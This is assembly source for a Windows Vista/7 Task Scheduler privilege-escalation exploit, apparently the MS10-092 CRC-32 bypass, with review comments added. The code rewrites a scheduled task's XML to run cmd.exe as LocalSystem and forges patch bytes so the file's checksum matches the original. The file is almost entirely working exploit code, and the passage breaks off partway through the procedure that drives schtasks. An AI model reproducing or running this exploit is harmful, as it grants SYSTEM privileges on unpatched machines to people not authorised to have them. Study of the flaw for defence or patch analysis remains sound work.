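; --------------------------------------------------------------------------
; Vista / Windows 7 Task Scheduler 0day, assembly version.
; Author's note (translated): the bug has been patched, so this is no longer
; of use.  The code creates a cmd.exe process running as LocalSystem.
;
; What the file does, as far as its own code shows: a task named "xml" is
; created with schtasks, its XML file under <system dir>\Tasks is rewritten
; so that <Author> becomes LocalSystem and <UserId> becomes S-1-5-18, and a
; 4-byte value is appended inside an XML comment so that the CRC-32 of the
; file is unchanged from the original.  The task is then disabled, re-enabled
; and run.
; NOTE(review): this looks like the Task Scheduler XML hash bypass that was
; fixed by MS10-092 (CVE-2010-3338) - confirm against the advisory before
; citing it.
;
; Toolchain: MASM (Intel syntax), 32-bit flat model, stdcall, Win32 API via
; the MASM32 include files.  Unless stated otherwise the procedures below
; preserve every register except eax (pushad/popad).
; --------------------------------------------------------------------------
.386
.model flat,stdcall
option casemap:none

include windows.inc
include user32.inc
include kernel32.inc
include advapi32.inc
include shlwapi.inc
include shell32.inc
includelib user32.lib
includelib kernel32.lib
includelib advapi32.lib
includelib shlwapi.lib
includelib shell32.lib

.data
; Standard reflected CRC-32 lookup table; entry 128 is the reflected
; polynomial 0EDB88320h.  Shared by Calc_Crc and rev_crc.
Crc_Table dd 00000000h, 77073096h, 0EE0E612Ch, 990951BAh, 076DC419h, 706AF48Fh, 0E963A535h, 9E6495A3h
          dd 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh, 97D2D988h, 09B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
          dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh, 6DDDE4EBh, 0F4D4B551h, 83D385C7h
          dd 136C9856h, 646BA8C0h, 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h, 8D080DF5h
          dd 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h, 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh
          dd 35B5A8FAh, 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h, 0DCD60DCFh, 0ABD13D59h
          dd 26D930ACh, 51DE003Ah, 0C8D75180h, 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
          dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h, 58684C11h, 0C1611DABh, 0B6662D3Dh
          dd 76DC4190h, 01DB7106h, 98D220BCh, 0EFD5102Ah, 71B18589h, 06B6B51Fh, 9FBFE4A5h, 0E8B8D433h
          dd 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h, 7F6A0DBBh, 086D3D2Dh, 91646C97h, 0E6635C01h
          dd 6B6B51F4h, 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh, 8208F4C1h, 0F50FC457h
          dd 65B0D9C6h, 12B7E950h, 8BBEB8EAh, 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
          dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h, 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh
          dd 4369E96Ah, 346ED9FCh, 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh, 0DD0D7CC9h
          dd 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h, 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh
          dd 5EDEF90Eh, 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h, 0B7BD5C3Bh, 0C0BA6CADh
          dd 0EDB88320h, 9ABFB3B6h, 03B6E20Ch, 74B1D29Ah, 0EAD54739h, 9DD277AFh, 04DB2615h, 73DC1683h
          dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh, 9309FF9Dh, 0A00AE27h, 7D079EB1h
          dd 0F00F9344h, 8708A3D2h, 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h, 6E6B06E7h
          dd 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh, 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h
          dd 0D6D6A3E8h, 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h, 3FB506DDh, 48B2364Bh
          dd 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h, 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
          dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h, 0BB0B4703h, 220216B9h, 5505262Fh
          dd 0C5BA3BBEh, 0B2BD0B28h, 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh, 5BDEAE1Dh
          dd 9B64C2B0h, 0EC63F226h, 756AA39Ch, 026D930Ah, 9C0906A9h, 0EB0E363Fh, 72076785h, 05005713h
          dd 95BF4A82h, 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh, 7CDCEFB7h, 0BDBDF21h
          dd 86D3D2D4h, 0F1D4E242h, 68DDB3F8h, 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
          dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh, 0F862AE69h, 616BFFD3h, 166CCF45h
          dd 0A00AE278h, 0D70DD2EEh, 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh, 3E6E77DBh
          dd 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h, 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h
          dd 0BDBDF21Ch, 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h, 54DE5729h, 23D967BFh
          dd 0B3667A2Eh, 0C4614AB8h, 5D681B02h, 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh

; UTF-16LE markers searched for in the task XML.  None is NUL-terminated;
; callers pass "sizeof" as the length.
g_AuthorFrontChar db '<',0,'A',0,'u',0,'t',0,'h',0,'o',0,'r',0,'>',0
g_AuthorBackChar  db '<',0,'/',0,'A',0,'u',0,'t',0,'h',0,'o',0,'r',0,'>',0
g_UserIdFrontChar db '<',0,'U',0,'s',0,'e',0,'r',0,'I',0,'d',0,'>',0
g_UserIdBackChar  db '<',0,'/',0,'U',0,'s',0,'e',0,'r',0,'I',0,'d',0,'>',0

; Replacement values written into the XML (UTF-16LE, no NUL).
g_SystemUser db 'L',0,'o',0,'c',0,'a',0,'l',0,'S',0,'y',0,'s',0,'t',0,'e',0,'m',0
g_UserId     db 'S',0,'-',0,'1',0,'-',0,'5',0,'-',0,'1',0,'8',0

; XML comment delimiters ("<!--", "-->") that wrap the CRC patch bytes, and
; the 2-byte UTF-16LE byte-order mark that starts the task file.
g_NoteBegin db '<',0,'!',0,'-',0,'-',0
g_NoteEnd   db '-',0,'-',0,'>',0
g_Header    db 0FFh,0FEh

; schtasks invocations (ANSI).  The task name is fixed to "xml"; g_TaskXml is
; appended to the system directory to reach the task's XML file.
g_TaskXml     db "\Tasks\xml",0
g_TaskCreate  db "/create /TN xml /sc monthly /tr %s%s%s",0
g_TaskDelete  db "/delete /f /TN xml",0
g_TaskDisable db "/change /TN xml /disable",0
g_TaskEnable  db "/change /TN xml /enable",0
g_TaskRun     db "/run /TN xml",0
g_TaskExe     db "schtasks",0
g_Qus         db '"',0
g_Cmd         db 'cmd.exe',0

.code

; Value GetFileSize returns on failure (INVALID_FILE_SIZE).
FILE_SIZE_INVALID equ 0FFFFFFFFh

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; GetFileHandle - open an existing file for read/write.
;
; Arguments:
;   szPath : ANSI path of an existing file
; Returns:
;   eax = file handle, or 0 (not INVALID_HANDLE_VALUE) when CreateFile fails,
;         so callers can test the result against NULL.
; Opens with read and write sharing so the file can be rewritten while other
; readers keep it open.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
GetFileHandle proc szPath:DWORD
    invoke CreateFile,szPath,\
        GENERIC_READ or GENERIC_WRITE,\
        FILE_SHARE_READ or FILE_SHARE_WRITE,\
        NULL,OPEN_EXISTING,\
        FILE_ATTRIBUTE_NORMAL,NULL
    .if ( eax == INVALID_HANDLE_VALUE )
        xor eax,eax
    .endif
    ret
GetFileHandle endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ReadFileText - read the whole file into a fresh GlobalAlloc'd buffer.
;
; Arguments:
;   hFile     : handle open for reading (the file pointer is not rewound;
;               the caller is expected to pass a freshly opened handle)
;   pDataSize : DWORD that receives the number of bytes read on success
; Returns:
;   eax = zero-initialised buffer holding the file (free with GlobalFree),
;         or 0 on failure: GetFileSize failed, the size does not fit in a
;         DWORD (high part non-zero), the allocation failed, or ReadFile
;         failed / returned fewer bytes than the file size.  *pDataSize is
;         left untouched on failure.
; Review fix: the original ignored ReadFile's result and returned the buffer
; and the file size even on a failed or short read, so callers went on to
; hash and rewrite a partly zero-filled buffer as if it were the file.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ReadFileText proc hFile:DWORD, pDataSize:DWORD
    LOCAL dwLow:DWORD,dwHigh:DWORD,dwNum:DWORD
    LOCAL pMem:DWORD

    mov dwHigh,0
    invoke GetFileSize,hFile,addr dwHigh
    ; A genuine 0FFFFFFFFh-byte file would also be rejected here; the task
    ; XML is tiny, so the ambiguity is not worth a GetLastError round trip.
    .if ( eax == FILE_SIZE_INVALID ) || ( dwHigh != 0 )
        xor eax,eax
        ret
    .endif
    mov dwLow,eax

    invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,dwLow
    .if ( eax == 0 )
        xor eax,eax
        ret
    .endif
    mov pMem,eax

    mov dwNum,0
    invoke ReadFile,hFile,pMem,dwLow,addr dwNum,NULL
    mov ecx,dwNum
    .if ( eax == 0 ) || ( ecx != dwLow )
        ; failed or short read: do not hand back a half-filled buffer
        invoke GlobalFree,pMem
        xor eax,eax
        ret
    .endif

    mov eax,pDataSize
    push dwNum
    pop [eax]
    mov eax,pMem
    ret
ReadFileText endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; WriteFileText - overwrite the file from offset 0 with XmlSize bytes of pXml.
;
; Arguments:
;   hFile   : handle open for writing
;   pXml    : data to write
;   XmlSize : number of bytes to write
; Returns:
;   eax = WriteFile's BOOL result (callers in this file ignore it).
; NOTE(review): the handle comes from GetFileHandle (OPEN_EXISTING) and the
; file is never truncated, so when the new content is shorter than the old
; file the old tail stays behind after the new data.  A SetEndOfFile after
; the WriteFile would remove it; left as in the original.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
WriteFileText proc hFile:DWORD, pXml:DWORD, XmlSize:DWORD
    LOCAL dwNum:DWORD
    invoke SetFilePointer,hFile,0,0,FILE_BEGIN
    invoke WriteFile,hFile,pXml,XmlSize,addr dwNum,NULL
    ret
WriteFileText endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Calc_Crc - CRC-32 of a byte buffer.
;
; Arguments:
;   szXmlTxt : start of the buffer
;   XmlSize  : length in bytes (0 gives 0, i.e. 0FFFFFFFFh xor 0FFFFFFFFh)
; Returns:
;   eax = CRC-32 (initial value 0FFFFFFFFh, table-driven reflected update
;         with Crc_Table, final XOR with 0FFFFFFFFh - the zlib/PKZIP
;         parameters).
; All other registers are preserved (pushad/popad).
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
Calc_Crc proc szXmlTxt:DWORD, XmlSize:DWORD
    LOCAL Crc_value:DWORD
    mov Crc_value,0FFFFFFFFh
    pushad
    lea edx,Crc_Table
    mov esi,szXmlTxt
    mov ecx,0
    .while( ecx < XmlSize )
        movzx eax, byte ptr[esi + ecx]      ; next input byte, zero-extended
        xor eax, Crc_value
        and eax, 000000FFh                  ; table index = (crc ^ byte) & 0FFh
        mov ebx, [edx + eax*4]
        shr Crc_value,8
        xor Crc_value,ebx                   ; crc = (crc >> 8) ^ table[index]
        inc ecx
    .endw
    popad
    mov eax,Crc_value
    xor eax,0FFFFFFFFh                      ; final complement
    ret
Calc_Crc endp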
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; rev_crc - compute the 4 patch bytes that make the CRC-32 of
;   leadStr || patch || endStr come out as OldCrc.
;
; Arguments:
;   leadStr, leadStrSize : bytes that precede the patch (hashed forward)
;   endStr, endStrSize   : bytes that follow the patch (walked backwards)
;   OldCrc               : the final CRC-32 the combined buffer must have
; Returns:
;   eax = the 4 patch bytes as a little-endian DWORD (byte 0 is the first
;         byte that has to follow leadStr); the caller stores it with a
;         4-byte memory copy.
; All other registers are preserved (pushad/popad around each loop).
;
; Method, as read from the code: the forward CRC step is
;   S' = (S >> 8) ^ Crc_Table[(S ^ b) & 0FFh].
; Every Crc_Table entry has a distinct top byte, so S' pins down the table
; index i, and the step can be undone as
;   S = ((S' ^ Crc_Table[i]) << 8) | (i ^ b).
; The code runs this inverse from the wanted end state back over endStr
; (last byte first), then four more times with b = 0, and XORs the result
; with the forward state after leadStr; the XOR yields the bridging bytes.
; Each index lookup is a linear scan of the table (LP1/LP2), which relies on
; the top byte of the current state being present in the table.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
rev_crc proc leadStr:DWORD,leadStrSize:DWORD,endStr:DWORD,endStrSize:DWORD,OldCrc:DWORD
    LOCAL Crc_value:DWORD,crc:DWORD,TableIndex:DWORD,Table_value:DWORD

    ; --- forward pass: CRC state after leadStr, without the final XOR ---
    mov Crc_value,0FFFFFFFFh
    pushad
    lea edx,Crc_Table
    mov esi,leadStr
    mov ecx,0
    .while ( ecx < leadStrSize )
        xor eax,eax
        mov al, byte ptr[esi + ecx]
        xor eax, Crc_value
        and eax, 000000FFh
        mov ebx, [edx + eax*4]
        shr Crc_value,8
        xor Crc_value,ebx
        inc ecx
    .endw
    popad

    ; --- target internal state: undo the final complement of OldCrc ---
    mov eax,OldCrc
    xor eax,0FFFFFFFFh
    mov crc,eax

    ; --- backward pass over endStr, last byte first ---
    pushad
    lea edx,Crc_Table
    mov esi,endStr
    mov ecx,0
    .while ( ecx < endStrSize )
        xor eax,eax
        mov TableIndex,eax                  ; start the scan at entry 0
        mov eax, [edx + eax*4]
        mov Table_value,eax
    LP1:
        ; advance TableIndex until the entry's top byte equals crc's top byte
        xor eax, crc
        shr eax,24
        and eax,000000FFh
        .if (eax)
            INC TableIndex
            mov eax,TableIndex
            mov eax,[edx+eax*4]
            mov Table_value,eax
            jmp LP1
        .endif
        mov eax,Table_value
        xor crc,eax
        shl crc,8                           ; upper 24 bits of the previous state
        ; low byte = endStr[endStrSize - 1 - ecx] ^ TableIndex
        mov eax,endStrSize
        sub eax,ecx
        dec eax
        xor ebx,ebx
        mov bl,[esi + eax]
        xor ebx,TableIndex
        or crc,ebx
        inc ecx
    .endw
    popad

    ; --- four more inverse steps with a zero input byte ---
    mov eax,crc                             ; no effect: pushad/popad restore eax
    pushad
    lea edx,Crc_Table
    mov ecx,0
    .while ( ecx < 4 )
        xor eax,eax
        mov TableIndex,eax
        mov eax, [edx + eax*4]
        mov Table_value,eax
    LP2:
        xor eax, crc
        shr eax,24
        and eax,000000FFh
        .if (eax)
            INC TableIndex
            mov eax,TableIndex
            mov eax,[edx+eax*4]
            mov Table_value,eax
            jmp LP2
        .endif
        mov eax,Table_value
        xor crc,eax
        shl crc,8
        mov eax,TableIndex                  ; b = 0, so the low byte is the index itself
        or crc,eax
        inc ecx
    .endw
    popad

    ; patch bytes = forward state XOR backward state
    mov eax,Crc_value
    xor eax,crc
    ret
rev_crc endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; mymemcmp - compare dwSize bytes at pBuf1 and pBuf2.
;   (The original header said "same as memcpy"; the body only compares.)
;
; Returns:
;   eax = 0 when all dwSize bytes are equal (including dwSize = 0),
;         otherwise the 1-based position of the first differing byte.
; Stops at the first difference.  All other registers are preserved.
; NOTE(review): no bounds are known here; it reads dwSize bytes from both
; buffers regardless of their real length.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
mymemcmp proc pBuf1:DWORD,pBuf2:DWORD,dwSize:DWORD
    LOCAL dwOff:DWORD
    mov dwOff,0
    pushad
    mov edi,pBuf1
    mov esi,pBuf2
    xor ecx,ecx
    .while (ecx < dwSize)
        mov al,byte ptr[edi+ecx]
        .if (al != byte ptr[esi+ecx])
            inc ecx
            mov dwOff,ecx                   ; 1-based offset of the mismatch
            .break
        .endif
        inc ecx
    .endw
    popad
    mov eax,dwOff
    ret
mymemcmp endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ChangeXmlText - rewrite the <Author> and <UserId> values in the XML text
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; ChangeXmlText - build a copy of the task XML in which the text between
;   <Author>...</Author> is replaced by "LocalSystem" and the text between
;   <UserId>...</UserId> by "S-1-5-18" (both UTF-16LE, from g_SystemUser
;   and g_UserId).
;
; Arguments:
;   pXml        : the original XML bytes (UTF-16LE, BOM included)
;   XmlSize     : their length in bytes
;   pNewXmlSize : DWORD that receives the new length
; Returns:
;   eax = new GlobalAlloc'd buffer (XmlSize + 1024 bytes, zero-filled), or 0
;         if the allocation fails (then *pNewXmlSize is not written).
; All other registers are preserved.
;
; NOTE(review): the four marker offsets stay 0 when a marker is not found,
; and the copy phase below does not check for that; "UserIdBeginOffset -
; AuthorEndOffset" and "XmlSize - UserIdEndOffset" then wrap and
; RtlMoveMemory is called with a huge length.  The scan also compares
; "sizeof marker" bytes starting at every offset up to XmlSize - 1, so the
; last few iterations read past the end of pXml.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ChangeXmlText proc pXml:DWORD,XmlSize:DWORD, pNewXmlSize:DWORD
    LOCAL AuthorBeginOffset:DWORD,AuthorEndOffset:DWORD,UserIdBeginOffset:DWORD,UserIdEndOffset:DWORD
    LOCAL NewXmlSize:DWORD,pNewXml:DWORD

    mov AuthorBeginOffset,0
    mov AuthorEndOffset,0
    mov UserIdBeginOffset,0
    mov UserIdEndOffset,0

    ; Pass 1: locate the four markers.  Each ".if" block runs only while its
    ; offset is still 0 and always "continue"s, so the markers are searched
    ; strictly one after another in document order.  The "Begin" offsets
    ; point just past the opening tag; the "End" offsets at the closing tag.
    ; ecx survives the invoke because mymemcmp preserves all but eax.
    pushad
    xor ecx,ecx
    .while (ecx < XmlSize)
        .if ( AuthorBeginOffset == NULL )
            mov eax,pXml
            add eax,ecx
            invoke mymemcmp,eax,offset g_AuthorFrontChar, sizeof g_AuthorFrontChar
            .if ( eax == 0 )
                mov AuthorBeginOffset, ecx
                add AuthorBeginOffset,sizeof g_AuthorFrontChar
            .endif
            inc ecx
            .continue
        .endif
        .if ( AuthorEndOffset == NULL )
            mov eax,pXml
            add eax,ecx
            invoke mymemcmp,eax,offset g_AuthorBackChar, sizeof g_AuthorBackChar
            .if ( eax == 0 )
                mov AuthorEndOffset, ecx
            .endif
            inc ecx
            .continue
        .endif
        .if ( UserIdBeginOffset == NULL )
            mov eax,pXml
            add eax,ecx
            invoke mymemcmp,eax,offset g_UserIdFrontChar, sizeof g_UserIdFrontChar
            .if ( eax == 0 )
                mov UserIdBeginOffset, ecx
                add UserIdBeginOffset, sizeof g_UserIdFrontChar
            .endif
            inc ecx
            .continue
        .endif
        .if ( UserIdEndOffset == NULL )
            mov eax,pXml
            add eax,ecx
            invoke mymemcmp,eax,offset g_UserIdBackChar, sizeof g_UserIdBackChar
            .if ( eax == 0 )
                mov UserIdEndOffset, ecx
            .endif
            inc ecx
            .continue
        .endif
        inc ecx
    .endw
    popad

    ; Dead loads (probably debugging leftovers); they change nothing.
    mov eax,AuthorBeginOffset
    mov eax,AuthorEndOffset
    mov eax,UserIdBeginOffset
    mov eax,UserIdEndOffset

    ; The replacements add at most sizeof g_SystemUser + sizeof g_UserId
    ; bytes, so 1024 bytes of slack is ample.
    mov eax,XmlSize
    add eax,1024
    invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,eax
    .if ( eax == NULL )
        ret
    .endif
    mov pNewXml,eax

    ; Pass 2: assemble
    ;   [0, AuthorBegin) + "LocalSystem" + [AuthorEnd, UserIdBegin)
    ;   + "S-1-5-18" + [UserIdEnd, XmlSize)
    pushad
    mov edi,pNewXml
    mov esi,pXml
    mov NewXmlSize,0
    invoke RtlMoveMemory,edi,esi,AuthorBeginOffset
    mov eax,AuthorBeginOffset
    add NewXmlSize,eax
    mov edi,pNewXml
    add edi,NewXmlSize
    invoke RtlMoveMemory,edi,offset g_SystemUser,sizeof g_SystemUser
    add NewXmlSize,sizeof g_SystemUser
    mov esi,pXml
    add esi,AuthorEndOffset
    mov edi,pNewXml
    add edi,NewXmlSize
    mov ecx,UserIdBeginOffset
    sub ecx,AuthorEndOffset
    push ecx                                ; keep the length across the call
    invoke RtlMoveMemory,edi,esi,ecx
    pop ecx
    add NewXmlSize,ecx
    mov edi,pNewXml
    add edi,NewXmlSize
    invoke RtlMoveMemory,edi,offset g_UserId, sizeof g_UserId
    add NewXmlSize,sizeof g_UserId
    mov esi,pXml
    add esi,UserIdEndOffset
    mov edi,pNewXml
    add edi,NewXmlSize
    mov ecx,XmlSize
    sub ecx,UserIdEndOffset
    push ecx
    invoke RtlMoveMemory,edi,esi,ecx
    pop ecx
    add NewXmlSize,ecx
    popad

    mov eax,pNewXmlSize
    push NewXmlSize
    pop [eax]
    mov eax,pNewXml
    ret
ChangeXmlText endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ConfigXmlFile - rewrite the task XML file in place so that the user name
;   and UserId are replaced (ChangeXmlText) while the CRC-32 of the file
;   (computed over everything after the 2-byte header) stays what it was.
;
; Arguments:
;   FilePath : ANSI path of the task XML file
; Returns nothing useful; eax is restored by popad.  On any failure the
; function closes the handle and returns silently, leaving the file as is.
;
; Layout of the rewritten file:
;   g_Header | rewritten XML (minus its own header) | "<!--" | 4 patch bytes | "-->"
; The 4 patch bytes come from rev_crc and are what makes the new content hash
; to the old CRC.  The original CRC is computed by this code itself from the
; file; presumably it equals the value the scheduler recorded when the task
; was created - nothing here reads the stored value.
;
; NOTE(review):
;   - the handle from GetFileHandle is not checked for 0 before use;
;   - the final Calc_Crc result is discarded instead of being compared with
;     OldCrc32 before the write;
;   - pXmlNoteBegin and pEndXml are never freed on the success path;
;   - the 4 patch bytes are arbitrary binary inside an XML comment, and there
;     is no retry if they happen to be invalid there;
;   - WriteFileText does not truncate, so a shorter result leaves the old
;     tail in the file.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ConfigXmlFile proc FilePath:DWORD
    LOCAL hFile:DWORD,OldXmlSize:DWORD,pOldXml:DWORD,OldCrc32:DWORD,FixCrc:DWORD
    LOCAL pXmlNoteBegin:DWORD,XmlNoteBeginSize:DWORD
    LOCAL pNewXml:DWORD,NewXmlSize:DWORD
    LOCAL pEndXml:DWORD,dwEndXmlSize:DWORD
    pushad
    invoke GetFileHandle, FilePath
    mov hFile,eax
    invoke ReadFileText,hFile,addr OldXmlSize
    mov pOldXml,eax
    .if (pOldXml == NULL)
        invoke CloseHandle,hFile
        popad
        ret
    .endif

    ; CRC-32 of the original file, skipping the 2-byte header (BOM).
    mov edi,pOldXml
    add edi,sizeof g_Header
    mov eax,OldXmlSize
    sub eax,sizeof g_Header
    invoke Calc_Crc,edi,eax
    mov OldCrc32,eax

    ; Rewrite the strings; pNewXml is a fresh buffer, the old one is freed.
    invoke ChangeXmlText, pOldXml, OldXmlSize, addr NewXmlSize
    mov pNewXml,eax
    invoke GlobalFree,pOldXml
    .if (pNewXml == NULL)
        invoke CloseHandle,hFile
        popad
        ret
    .endif

    ; Build "lead string" = new XML without its header + "<!--", which is
    ; everything that precedes the 4 patch bytes.  (The literal 2 is
    ; sizeof g_Header.)
    mov ecx,NewXmlSize
    sub ecx,2
    add ecx,sizeof g_NoteBegin
    mov XmlNoteBeginSize,ecx
    invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,XmlNoteBeginSize
    mov pXmlNoteBegin,eax
    .if ( pXmlNoteBegin == NULL )
        invoke GlobalFree,pNewXml
        invoke CloseHandle,hFile
        popad
        ret
    .endif
    mov edi,pNewXml
    add edi,sizeof g_Header
    mov ecx,NewXmlSize
    sub ecx,2
    push ecx
    invoke RtlMoveMemory,pXmlNoteBegin,edi,ecx
    invoke GlobalFree,pNewXml
    pop ecx
    mov edi,pXmlNoteBegin
    add edi,ecx
    invoke RtlMoveMemory,edi,offset g_NoteBegin,sizeof g_NoteBegin

    ; 4 patch bytes such that CRC(lead || patch || "-->") == OldCrc32.
    invoke rev_crc,pXmlNoteBegin,XmlNoteBeginSize,offset g_NoteEnd,sizeof g_NoteEnd,OldCrc32
    mov FixCrc,eax

    ; Assemble the final file: header + lead + patch (4 raw bytes) + "-->".
    mov ecx,sizeof g_Header
    add ecx,XmlNoteBeginSize
    add ecx,4
    add ecx,sizeof g_NoteEnd
    mov dwEndXmlSize,ecx
    invoke GlobalAlloc,GMEM_FIXED or GMEM_ZEROINIT,dwEndXmlSize
    mov pEndXml,eax
    .if ( pEndXml == NULL )
        invoke GlobalFree,pXmlNoteBegin
        invoke CloseHandle,hFile
        popad
        ret
    .endif
    invoke RtlMoveMemory,pEndXml, offset g_Header, sizeof g_Header
    mov ecx,sizeof g_Header
    push ecx                                ; ecx = running write offset
    mov edi,pEndXml
    add edi,ecx
    invoke RtlMoveMemory,edi,pXmlNoteBegin,XmlNoteBeginSize
    pop ecx
    add ecx,XmlNoteBeginSize
    push ecx
    mov edi,pEndXml
    add edi,ecx
    invoke RtlMoveMemory, edi, addr FixCrc, 4
    pop ecx
    add ecx,4
    mov edi,pEndXml
    add edi,ecx
    invoke RtlMoveMemory, edi, offset g_NoteEnd, sizeof g_NoteEnd

    ; Self-check: recompute the CRC over the result (the value is not used).
    mov edi,pEndXml
    add edi,2
    mov ecx,dwEndXmlSize
    sub ecx,2
    invoke Calc_Crc,edi,ecx

    ; Write the assembled file back from offset 0.
    invoke WriteFileText,hFile,pEndXml,dwEndXmlSize
    invoke CloseHandle,hFile
    popad
    ret
ConfigXmlFile endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ByPassUac - drive schtasks to create, rewrite, re-enable and run the task.
;
; Sequence (each schtasks run via ShellExecuteEx, window hidden, waited on):
;   1. schtasks /delete /f /TN xml                  (remove a stale copy)
;   2. schtasks /create /TN xml /sc monthly /tr "cmd.exe"
;   3. ConfigXmlFile(<system dir>\Tasks\xml)        (rewrite the XML)
;   4. schtasks /change /TN xml /disable
;   5. schtasks /change /TN xml /enable             (presumably makes the
;                                                    scheduler re-read step 3)
;   6. schtasks /run /TN xml
; Takes no arguments and returns nothing meaningful.
;
; NOTE(review): none of the ShellExecuteEx results is checked - if one fails,
; eInfo.hProcess still holds the previous (already signalled) handle or NULL
; and the wait returns at once.  With SEE_MASK_NOCLOSEPROCESS the caller
; owns hProcess, and none of the six handles is closed.  CurPath and szTemp
; are unused.  lstrcat into the 1024-byte FilePath is unbounded, though the
; system directory plus "\Tasks\xml" is far shorter in practice.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ByPassUac proc
    LOCAL FilePath[1024]:BYTE,szCmd[1024]:BYTE
    LOCAL CurPath[1024]:BYTE,szTemp[1024]:BYTE
    LOCAL eInfo:SHELLEXECUTEINFO

    invoke RtlZeroMemory,addr eInfo,sizeof eInfo
    mov eInfo.cbSize,sizeof eInfo
    mov eInfo.fMask,SEE_MASK_NOCLOSEPROCESS
    mov eInfo.nShow,SW_HIDE
    mov eInfo.lpFile,offset g_TaskExe       ; "schtasks"; lpVerb stays NULL

    ; FilePath = <system directory> + "\Tasks\xml"
    invoke RtlZeroMemory,addr FilePath,sizeof FilePath
    invoke GetSystemDirectory,addr FilePath,sizeof FilePath
    invoke lstrcat,addr FilePath,offset g_TaskXml

    ; szCmd = /create /TN xml /sc monthly /tr "cmd.exe"
    invoke wsprintf,addr szCmd,\
        offset g_TaskCreate,\
        offset g_Qus,\
        offset g_Cmd,\
        offset g_Qus

    ; delete any existing task with the same name first
    mov eInfo.lpParameters,offset g_TaskDelete
    invoke ShellExecuteEx,addr eInfo
    invoke WaitForSingleObject,eInfo.hProcess,INFINITE

    ; create the task
    lea eax,szCmd
